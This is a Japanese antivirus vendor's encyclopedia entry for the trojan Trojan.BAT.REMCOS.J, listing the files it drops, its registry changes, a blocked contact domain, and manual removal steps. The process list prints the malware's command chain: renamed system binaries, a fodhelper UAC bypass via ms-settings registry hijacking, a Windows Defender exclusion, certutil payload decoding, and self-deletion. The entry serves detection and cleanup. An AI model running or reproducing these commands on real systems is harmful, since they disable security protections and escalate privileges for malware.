Trojan.BAT.REMCOS.J
Trojan:Win32/Leonem [non_writable_container] (MICROSOFT)
Windows
![](/vinfo/imgFiles/JPlegend.jpg)
マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
感染報告の有無 :
はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のファイルを作成します。
- %AppDataLocal%\PowerShell\StartupProfileData-NonInteractive
- %Public%\alpha.exe
- %Public%\kn.exe
- %Public%\Lewxa.txt
- %Public%\Libraries\Lewxa.com
- %Public%\xkn.exe
- %User Temp%\kvbhewqd.j2p.psm1
- %User Temp%\sid1tbnn.54n.ps1
マルウェアは、以下のプロセスを追加します。
- cmd /c extrac32.exe /C /Y %System%\cmd.exe %Public%\alpha.exe
- %Public%\alpha /c extrac32.exe /C /Y %System%\WindowsPowerShell\v1.0\powershell.exe %Public%\xkn.exe
- %Public%\alpha /c extrac32.exe /C /Y %System%\certutil.exe %Public%\kn.exe
- %Public%\alpha /c %Public%\xkn -WindowStyle hidden -Command "%Public%\alpha /c reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d '%Public%\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath %System Root%\Users "' start fodhelper.exe "
- "%Public%\alpha.exe" /c reg add HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "%Public%\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath %System Root%\Users "
- %Public%\alpha /c %Public%\kn -decodehex -F "{Malware Path}\{Malware Filename}" "%Public%\Lewxa.txt" 9
- %Public%\alpha /c %Public%\kn -decodehex -F "%Public%\Lewxa.txt" "%Public%\Libraries\Lewxa.com" 12
- %Public%\Libraries\Lewxa.com
- %Public%\alpha /c del "%Public%\Lewxa" / A / F / Q / S
- %Public%\alpha /c del "%Public%\Lewxa.txt" / A / F / Q / S
- %Public%\alpha /c del "%Public%\xkn.exe" / A / F / Q / S
- %Public%\alpha /c del "%Public%\kn.exe" / A / F / Q / S
- %Public%\alpha /c taskkill /F /IM SystemSettings.exe
- %Public%\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
- taskkill /F /IM SystemSettingsAdminFlows.exe
- cmd /c del "%Public%\alpha.exe" / A / F / Q / S
自動実行方法
マルウェアは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。
HKEY_USERS\{SID}_CLASSES\ms-settings\
shell\open\command
{Default} = %Public%\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath %System Root%\Users
その他
マルウェアは、以下のレジストリキーを追加します。
HKEY_USERS\{SID}_CLASSES
ms-settings
HKEY_USERS\{SID}_CLASSES\ms-settings
shell
HKEY_USERS\{SID}_CLASSES\ms-settings\
shell
open
HKEY_USERS\{SID}_CLASSES\ms-settings\
shell\open
command
マルウェアは、以下の不正なWebサイトにアクセスします。
- https://{BLOCKED}ive.com
対応方法
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
手順 4
このレジストリ値を削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_USERS\{SID}_CLASSES\ms-settings\shell\open\command
- {Default} = %Public%\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath %System Root%\Users
- {Default} = %Public%\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath %System Root%\Users
手順 5
このレジストリキーを削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_USERS\{SID}_CLASSES\ms-settings\shell\open\
- command
- command
- In HKEY_USERS\{SID}_CLASSES\ms-settings\shell\
- open
- open
- In HKEY_USERS\{SID}_CLASSES\ms-settings\
- shell
- shell
- In HKEY_USERS\{SID}_CLASSES\
- ms-settings
- ms-settings
手順 6
以下のファイルを検索し削除します。
- %AppDataLocal%\PowerShell\StartupProfileData-NonInteractive
- %Public%\alpha.exe
- %Public%\kn.exe
- %Public%\Lewxa.txt
- %Public%\Libraries\Lewxa.com
- %Public%\xkn.exe
- %User Temp%\kvbhewqd.j2p.psm1
- %User Temp%\sid1tbnn.54n.ps1
手順 7
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「Trojan.BAT.REMCOS.J」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください